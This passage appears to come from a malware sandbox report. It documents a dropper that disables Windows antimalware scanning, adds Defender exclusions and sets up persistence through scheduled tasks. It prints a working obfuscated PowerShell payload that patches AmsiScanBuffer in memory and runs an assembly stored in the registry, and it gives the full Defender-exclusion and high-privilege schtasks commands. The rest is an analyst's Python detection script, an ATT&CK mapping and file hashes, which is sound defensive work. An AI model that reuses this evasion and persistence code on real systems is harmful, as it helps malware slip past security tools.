@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZuGrjhfmKyx=$oZCKWVmKBnBvx.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'ndl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$zowcvTAAudkOiE=$wJCtIddCwFSxtB.Invoke($Null,@([Object]$ZuGrjhfmKyx,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$dTUmCadgHaaHTfUBV=$wJCtIddCwFSxtB.Invoke($Null,@([Object]$ZuGrjhfmKyx,[Object](''+'V'+'i'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'lP'+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$JvYFKju=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zowcvTAAudkOiE,$CNOqMpRayuiitoTsPex).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$SHYXHrjFYhTcZdRzu=$wJCtIddCwFSxtB.Invoke($Null,@([Object]$JvYFKju,[Object]('Am'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$CIxxWjmBDS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dTUmCadgHaaHTfUBV,$bMFkmqrwOPqwzSeAQoRvao).Invoke($SHYXHrjFYhTcZdRzu,[uint32]8,4,[ref]$CIxxWjmBDS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SHYXHrjFYhTcZdRzu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dTUmCadgHaaHTfUBV,$bMFkmqrwOPqwzSeAQoRvao).Invoke($SHYXHrjFYhTcZdRzu,[uint32]8,0x20,[ref]$CIxxWjmBDS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'W'+'A'+''+'R'+''+'E'+'').GetValue('s'+[Char](118)+'st'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 3520
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | PID 1208
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | PID 1244
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | PID 1316
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | PID 1380
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | PID 1388
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | PID 1400
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | PID 1420
  [2] C:\Windows\system32\sihost.exe | sihost.exe | PID 2652
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | PID 1580
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | PID 1604
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | PID 1676
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | PID 1724
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 1800
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | PID 1808
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | PID 1936
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | PID 2000
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID 2012
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | PID 1756
[1] C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID 2112
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | PID 2128
  - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | PID 2224
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | PID 2308
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | PID 2440
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | PID 2448
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID 2664
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | PID 2696
  - Drops file in System32 directory
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | PID 2732
[1] C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | PID 2788
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | PID 2796
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | PID 2804
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker | PID 2984
[1] C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | PID 752
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | PID 3292
[1] C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID 3424
  - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Sex.exe | "C:\Users\Admin\AppData\Local\Temp\Sex.exe" | PID 3188
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [3] C:\Users\Public\svClient.exe | "C:\Users\Public\svClient.exe" | PID 1164
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1383.tmp.bat"" | PID 448
        [5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 4856
        [5] C:\Windows\system32\timeout.exe | timeout 3 | PID 2476
          - Delays execution with timeout.exe
        [5] C:\Users\Admin\svClient\svClient.exe | "C:\Users\Admin\svClient\svClient.exe" | PID 2380
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          [6] C:\Windows\SYSTEM32\schtasks.exe | "schtasks.exe" /query /TN svClient.exe | PID 4864
            [7] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 3420
          [6] C:\Windows\SYSTEM32\schtasks.exe | "schtasks.exe" /Create /SC ONCE /TN "svClient.exe" /TR "C:\Users\Admin\svClient\svClient.exe \"\svClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST | PID 3004
            - Scheduled Task/Job: Scheduled Task
          [6] C:\Windows\SYSTEM32\schtasks.exe | "schtasks.exe" /query /TN svClient.exe | PID 1696
            [7] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 2640
          [6] C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /sc hourly /mo 1 /tn "svClient_Task-HOURLY-01" /tr "%MyFile%" /st 00:00 | PID 1220
            - Scheduled Task/Job: Scheduled Task
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\svClient.exe' | PID 2688
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Public\sv.exe | "C:\Users\Public\sv.exe" | PID 3132
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\sv.exe' | PID 3960
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc | PID 3548
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3732
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4780
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2212
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:384
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3948
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3144
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4708
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3300
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3192
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:228
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:1672
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:436
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:1528
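The chain under Explorer.EXE is what matters for response: the sample drops svClient.exe into C:\Users\Public, adds Defender exclusions for both dropped binaries with Add-MpPreference, copies itself to C:\Users\Admin\svClient via a temporary batch file that sleeps with timeout, and then registers two scheduled tasks, one of them with /RL HIGHEST. The script below is an added triage example, not part of the sandbox output: it rebuilds parent links from the depth column of a tree like the one above and runs a handful of rules over each process. The RECORDS list is transcribed from the chain above; the rule names and thresholds are this example's own.

```python
"""Rebuild a sandbox process tree from (depth, image, cmdline, pid) rows and
flag the persistence / defence-evasion steps seen in the report above.
Added example; records below are transcribed from the tree, not live data."""
import re
from dataclasses import dataclass, field
from typing import Iterator, List, Optional, Tuple

# Transcribed from the chain under Explorer.EXE above (constructed input).
RECORDS = [
    (1, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE", 3424),
    (2, r"C:\Users\Admin\AppData\Local\Temp\Sex.exe", r'"C:\Users\Admin\AppData\Local\Temp\Sex.exe"', 3188),
    (3, r"C:\Users\Public\svClient.exe", r'"C:\Users\Public\svClient.exe"', 1164),
    (4, r"C:\Windows\system32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1383.tmp.bat""', 448),
    (5, r"C:\Windows\system32\timeout.exe", "timeout 3", 2476),
    (5, r"C:\Users\Admin\svClient\svClient.exe", r'"C:\Users\Admin\svClient\svClient.exe"', 2380),
    (6, r"C:\Windows\SYSTEM32\schtasks.exe", r'"schtasks.exe" /Create /SC ONCE /TN "svClient.exe" /TR "C:\Users\Admin\svClient\svClient.exe \"\svClient.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST', 3004),
    (6, r"C:\Windows\System32\schtasks.exe", r'"C:\Windows\System32\schtasks.exe" /create /sc hourly /mo 1 /tn "svClient_Task-HOURLY-01" /tr "%MyFile%" /st 00:00', 1220),
    (3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r'"powershell.exe" Add-MpPreference -ExclusionPath ' + r"'C:\Users\Public\svClient.exe'", 2688),
    (3, r"C:\Users\Public\sv.exe", r'"C:\Users\Public\sv.exe"', 3132),
    (3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", r'"powershell.exe" Add-MpPreference -ExclusionPath ' + r"'C:\Users\Public\sv.exe'", 3960),
]

@dataclass
class Proc:
    depth: int
    image: str
    cmdline: str
    pid: int
    parent: Optional["Proc"] = None
    children: list = field(default_factory=list)

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()

def build_tree(records) -> List[Proc]:
    """A row's parent is the nearest earlier row with a smaller depth, which is
    how the sandbox lays out its tree."""
    procs, stack = [], []
    for depth, image, cmdline, pid in records:
        p = Proc(depth, image, cmdline, pid)
        while stack and stack[-1].depth >= depth:
            stack.pop()
        if stack:
            p.parent = stack[-1]
            stack[-1].children.append(p)
        stack.append(p)
        procs.append(p)
    return procs

def ancestry(p: Proc) -> str:
    chain = []
    while p is not None:
        chain.append(f"{p.name}:{p.pid}")
        p = p.parent
    return " <- ".join(chain)

USER_DIR = re.compile(r"^C:\\Users\\", re.I)
PUBLIC_DIR = re.compile(r"^C:\\Users\\Public\\", re.I)

def rules(p: Proc) -> Iterator[Tuple[str, str]]:
    """Yield (rule, detail) pairs; rule names are this example's own."""
    cl = p.cmdline
    if p.name == "powershell.exe" and re.search(r"Add-MpPreference\s+-Exclusion", cl, re.I):
        m = re.search(r"'([^']+)'", cl)
        yield "defender_exclusion", m.group(1) if m else cl
    if p.name == "schtasks.exe" and re.search(r"/create\b", cl, re.I):
        tn = re.search(r'/tn\s+"?([^"\s]+)', cl, re.I)
        tr = re.search(r'/tr\s+"?([^"\s]+)', cl, re.I)
        if re.search(r"/rl\s+highest\b", cl, re.I):
            yield "schtask_highest", tn.group(1) if tn else cl
        # Task action under a user-writable path, or an env var the sandbox never expanded.
        if tr and (USER_DIR.match(tr.group(1)) or "%" in tr.group(1)):
            yield "schtask_user_target", tr.group(1)
    # timeout inside a cmd /c batch spawned by a user-writable binary: the
    # classic sleep-then-relaunch pattern used to outlive the original process.
    if (p.name == "timeout.exe" and p.parent and p.parent.name == "cmd.exe"
            and p.parent.parent and USER_DIR.match(p.parent.parent.image)):
        yield "delay_then_relaunch", cl
    if PUBLIC_DIR.match(p.image):
        yield "public_dir_execution", p.image

def triage(records) -> List[dict]:
    alerts = []
    for p in build_tree(records):
        for rule, detail in rules(p):
            alerts.append({"pid": p.pid, "rule": rule, "detail": detail, "chain": ancestry(p)})
    return alerts

if __name__ == "__main__":
    for a in triage(RECORDS):
        print(f"[{a['rule']}] pid={a['pid']} {a['detail']}\n    {a['chain']}")
```

Each alert carries the full ancestry string, so an analyst can tell at a glance that the /RL HIGHEST task was created by the copy in C:\Users\Admin\svClient, not by the original dropper, and that both Defender exclusions were added directly by Sex.exe before the copies ran.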
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize: 328B
MD5: c8e7d4b3f61a75f8c16f4d4c16102274
SHA1: b74dc3888190e363dd51d426f0cabeb8b9f113bd
SHA256: ea49e265960a25bd14142cfe839edacc4c1886cab07418330b8a9056a5080916
SHA512: ceb8356a440b5a865ac49b267f29f2503216edb945b58b04915cb5f685c5a65424e24281697289a265d87bd70f644e688c6a8a3c29ec188d254fbde5e3f4bda2
-
Filesize: 859B
MD5: e204f3d12abd1691ce1f149399441188
SHA1: 798042095539abfe857e456fca4e1035f67d29bf
SHA256: 685f70bf685f654651dcd0acc495b6f52f02f73cc3ca8b3d2c8433aac9ba144d
SHA512: 804c5ea57a59f86fd0c34479be4c479230bff79093548e8461758829928969da565c211ccc9cb9befa0fef15f0400a5b1f17d5ddf88aef6ff01b67a191176b9f
-
Filesize: 2KB
MD5: 3d086a433708053f9bf9523e1d87a4e8
SHA1: b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256: 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512: 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize: 18KB
MD5: 835f118fcf6d7434f00e99ed06727ae9
SHA1: a19615ec0ca9fae03592e8afb83a8bbf99fae119
SHA256: 459097868c59c211efc057d9986b199be96a7f5ffd605ac14a85cdb523574019
SHA512: 649eb23f6400e2001d0776883054b1062e31116bab8cd82e6cfe8e95687f7db9a2e1c7e05d0d7daa1aa70d8f83a541a321fc98d57cc406f31868743b033b2634
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 145B
MD5: 22a1a949ac06f496e6601932c5aa72c3
SHA1: ca03112879fc18eab5178e4a17e86f128bb0cbc8
SHA256: 5074ce1bfc5e35de8a8e2a43194b341ecec7a94d54d509aca9a9e831dc72c7ee
SHA512: 45fb1c70473cb7af13c72960ff7c4a7d785a220c6680e566dbbbc943140e56b6269acc4508b0cb3f7394d3911ed3899582d6db8ffc9bcd83a3a906976c4939d6
-
Filesize: 163KB
MD5: b20e29f2b88234cda8b95b43a4fec8aa
SHA1: 13cca52a0dc3b9b352e14688f444ad9bcb9a9f4f
SHA256: e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a
SHA512: 019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a
-
Filesize: 41KB
MD5: 504d64de3a3ecf52cc257d723b616838
SHA1: 725749227a5ddf0d19a08876462d18888f560cc9
SHA256: 02df721f639ca11946fd9f5479dfcd6a183a0e1c214377619724970f66058aa3
SHA512: bbb9c3eb59fa596000cc554c60101907688adc6851b30252d541b176a7b312fb3019768a535ac0893102bdeed2e43fa83eb0ce9579cb0aac1f26d2b12fcaf299